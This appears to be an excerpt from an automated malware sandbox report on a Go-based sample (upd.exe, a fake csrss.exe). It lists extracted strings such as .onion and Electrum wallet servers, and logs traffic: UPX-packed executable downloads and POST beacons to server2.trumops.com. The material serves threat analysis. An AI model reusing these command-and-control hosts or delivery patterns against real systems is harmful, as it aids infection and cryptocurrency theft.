        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:12:39 GMTContent-Type: application/octet-streamContent-Length: 3788288Connection: keep-alivecontent-disposition: attachment; filename=app.exeetag: "616ea4c2-39ce00"last-modified: Tue, 19 Oct 2021 10:58:10 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 726Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc077cd066933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 24 8a 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 d0 39 00 00 10 00 00 00 30 52 00 20 08 8c 00 00 40 52 00 00 10 8c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 20 8c 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 8c 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 30 52 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 d0 39 00 00 40 52 00 00 ca 39 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 8c 00 00 02 00 00 00 cc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:13:29 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 802Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc1b08ff06913-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 640Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36Content-Length: 660Accept-Encoding: gzip
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc126190b7037-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc15e7c2f774a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:14:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc28c88274a67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
        Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
        Source: svchost.exe, 0000001F.00000003.417632468.000002A19898C000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
        Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
        Source: svchost.exe, 0000001F.00000003.417671941.000002A19899D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-10-29T13:27:37.0950019Z||.||b9c681af-ac5a-4a25-a010-7b8f06b1a611||1152921505694056387||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
        Source: upd.exe, csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
